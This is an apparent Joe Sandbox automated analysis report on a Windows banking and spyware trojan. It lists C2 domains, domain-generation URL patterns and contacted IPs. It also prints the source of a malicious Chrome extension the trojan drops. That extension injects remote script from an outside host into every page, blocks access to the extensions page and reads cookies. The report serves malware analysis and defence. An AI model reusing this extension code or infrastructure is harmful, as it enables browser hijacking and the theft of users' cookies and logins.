                                                                                                    https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=056BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://feedback.googleusercontent.com56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.xunlei.com/download_user.dll.2.drfalse
                                                                                                          high
                                                                                                          http://pki.goog/gsr2/GTS1O1.crt0#ecvFEAD.tmp.9.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://84CFBA021A5A6662.xyz/info_old/wV56BB1610C0318054.exe, 00000004.00000002.377383414.00000000005A6000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/soap/envelope/download_user.dll.2.drfalse
                                                                                                              high
                                                                                                              https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              low
                                                                                                              https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecvFEAD.tmp.9.drfalse
                                                                                                                high
                                                                                                                http://84cfba021a5a6662.xyz/info_old/wICyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://84cfba021a5a6662.xyz/Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.370858416.00000000007E4000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377399096.00000000005BB000.00000004.00000020.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecvFEAD.tmp.9.drfalse
                                                                                                                    high
                                                                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecvFEAD.tmp.9.drfalse
                                                                                                                      high
                                                                                                                      http://84CFBA021A5A6662.xyz/f56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://curl.haxx.se/docs/http-cookies.html56BB1610C0318054.exe, 00000002.00000002.414835494.000000000344F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380176244.000000000330F000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.openssl.org/support/faq.htmldownload_user.dll.2.drfalse
                                                                                                                          high
                                                                                                                          http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tLecvFEAD.tmp.9.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629ecvFEAD.tmp.9.drfalse
                                                                                                                            high
                                                                                                                            https://www.instagram.comsec-fetch-mode:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.instagram.com/accounts/login/ajax/facebook/56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                                              high

                                                                                                                              Contacted IPs


                                                                                                                              Public

                                                                                                                              IP | Domain | Country | ASN | ASN Name | Malicious
                                                                                                                              104.21.23.16 | unknown | United States | 13335 | CLOUDFLARENETUS | false

                                                                                                                              Private

                                                                                                                              IP
                                                                                                                              192.168.2.1
                                                                                                                              127.0.0.1

                                                                                                                              General Information

                                                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                                                              Analysis ID:346134
                                                                                                                              Start date:29.01.2021
                                                                                                                              Start time:17:35:36
                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                              Overall analysis duration:0h 12m 11s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Sample file name:Cyfj6XGbkd (renamed file extension from none to exe)
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                              Number of analysed new started processes analysed:36
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • HDC enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal93.bank.troj.spyw.evad.winEXE@32/37@4/3
                                                                                                                              EGA Information:Failed
                                                                                                                              HDC Information:
                                                                                                                              • Successful, ratio: 60.1% (good quality ratio 57.2%)
                                                                                                                              • Quality average: 80.5%
                                                                                                                              • Quality standard deviation: 27.1%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 68%
                                                                                                                              • Number of executed functions: 117
                                                                                                                              • Number of non-executed functions: 225
                                                                                                                              Cookbook Comments:
                                                                                                                              • Adjust boot time
                                                                                                                              • Enable AMSI
                                                                                                                              Warnings:
                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.139.144, 51.11.168.160, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.186, 52.155.217.156, 20.54.26.129, 23.210.248.85, 204.79.197.200, 13.107.21.200
                                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

Time | Type | Description
17:36:38 | API Interceptor | 4x Sleep call for process: Cyfj6XGbkd.exe modified
17:36:46 | API Interceptor | 4x Sleep call for process: 56BB1610C0318054.exe modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

Match | Associated Sample Name / URL | Detection | Context
104.21.23.16 | FileSetup-v17.04.41.exe | malicious | 84CFBA021A5A6662.xyz/info_old/ddd
104.21.23.16 | FileSetup-v17.04.41.exe | malicious | 84CFBA021A5A6662.xyz/info_old/ddd

                                                                                                                              Domains

Match | Associated Sample Name / URL | Detection | Context
84CFBA021A5A6662.xyz | N1yprTBBXs.exe | malicious | 172.67.208.74
84CFBA021A5A6662.xyz | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
84CFBA021A5A6662.xyz | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
84cfba021a5a6662.xyz | N1yprTBBXs.exe | malicious | 172.67.208.74
84cfba021a5a6662.xyz | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
84cfba021a5a6662.xyz | FileSetup-v17.04.41.exe | malicious | 104.21.23.16

                                                                                                                              ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS | Royalmail-Shipment.xls | malicious | 172.67.1.225
CLOUDFLARENETUS | N1yprTBBXs.exe | malicious | 172.67.208.74
CLOUDFLARENETUS | Royalmail-Shipment.xls | malicious | 172.67.1.225
CLOUDFLARENETUS | PO#PDT28394209.exe | malicious | 172.67.176.199
CLOUDFLARENETUS | c8TrAKsz0T.exe | malicious | 104.21.47.75
CLOUDFLARENETUS | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
CLOUDFLARENETUS | RddH6rLRfH.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | Immuni.apk | malicious | 172.64.100.5
CLOUDFLARENETUS | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
CLOUDFLARENETUS | UGPK60taH6.dll | malicious | 104.20.184.68
CLOUDFLARENETUS | 4PDNbYK5fj.exe | malicious | 172.67.169.213
CLOUDFLARENETUS | pmTdQ57tvM.exe | malicious | 172.67.169.213
CLOUDFLARENETUS | 7BtV39hziI.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | dc4AaqW6Aa.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | lAy87VNPiL.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | 97aa4Ywd9y.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | wuRBlQt0Tz.exe | malicious | 172.67.169.213
CLOUDFLARENETUS | 4GRuinub4a.exe | malicious | 172.67.169.213
CLOUDFLARENETUS | v8c1m9dW8G.exe | malicious | 172.67.169.213
CLOUDFLARENETUS | XQx9brj85p.exe | malicious | 172.67.169.213

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | N1yprTBBXs.exe | malicious
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | FileSetup-v17.04.41.exe | malicious
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | FileSetup-v17.04.41.exe | malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | N1yprTBBXs.exe | malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | FileSetup-v17.04.41.exe | malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | FileSetup-v17.04.41.exe | malicious
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp | N1yprTBBXs.exe | malicious
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp | FileSetup-v17.04.41.exe | malicious
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp | FileSetup-v17.04.41.exe | malicious

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Cookies1611970637026
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):0.6951152985249047
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Cookies1611970645636
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):0.6951152985249047
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\background.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):886
                                                                                                                                                Entropy (8bit):5.022683940423506
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                                MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                                SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                                SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                                SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                                Malicious:false
Preview:
    $(function() {
        chrome.tabs.onSelectionChanged.addListener(function(tab,info){
            chrome.tabs.query({
                active : true
            }, function(tab) {
                var pageUrl = tab[0].url;
                console.log(pageUrl);
                if (Number(pageUrl.indexOf("extensions")) > 1)
                {
                    chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'});
                }
            });
        });

        chrome.webRequest.onBeforeRequest.addListener(function(details) {
            chrome.tabs.query({
                active : true
            }, function(tab) {
                var pageUrl = tab[0].url;
            });

            var url = details.url;
        }, {
            urls : [ "<all_urls>" ]
        }, [ "blocking" ]);

        function sendMessageToContentScript(message, callback) {
            chrome.tabs.query({
                active : true,
                currentWindow : true
            }, function(tabs) {
                chrome.tabs.sendMessage(tabs[0].id, message, function(response) {
                    if (callback)
                        callback(response);
                });
            });
        }
    });
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\book.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):152
                                                                                                                                                Entropy (8bit):5.039480985438208
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                Malicious:false
Preview:
    (function(){
        var s = document.createElement('script');
        s.src = '//kellyfight.com/22aff56f45f6b36dec.js';
        document.body.appendChild(s);
    })();
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon.png
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1161
                                                                                                                                                Entropy (8bit):7.79271055262892
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                                MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                                SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                                SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                                SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon48.png
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2235
                                                                                                                                                Entropy (8bit):7.880518016071819
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                                MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                                SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                                SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                                SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):93637
                                                                                                                                                Entropy (8bit):5.292996107428883
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\manifest.json
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2380
                                                                                                                                                Entropy (8bit):5.687293760500434
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.html
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):5.048307538221611
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):642
                                                                                                                                                Entropy (8bit):4.985939227199713
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5453
                                                                                                                                                Entropy (8bit):5.1778438140266125
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:nHXbTqqz/X7jgFO4IV+H/k0JCKL8rbobOEQVuwv:nHXbTJz/rMFoon4KsX
                                                                                                                                                MD5:CEA23A1FFBF8271C9A4543A57C4D9684
                                                                                                                                                SHA1:48D0514B8C6917B57BD092731B2C51679E31B005
                                                                                                                                                SHA-256:A1D30920EB823D01DD3BD0FEFD3004C3F70732ECBD73A7C8D443C76473B65E7E
                                                                                                                                                SHA-512:5692C7BB8667B1E6090169DE636E4673752D9312B8A9ED09D66A34A54954B12725F18047F37DFFFD850BF24B3EA56746C6D5E64D4250B9B2D1EDFA9575638FCE
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245952892183974","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34636
                                                                                                                                                Entropy (8bit):5.5394367000232565
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:AEpwDvUckPWfr+odLl0b1kXqKf/pUZNCgVLH2HfVrUkGRnJziWC:EDhLwjRnNiv
                                                                                                                                                MD5:0DB0D353C97F12B5A1D82ADCC9F25B9D
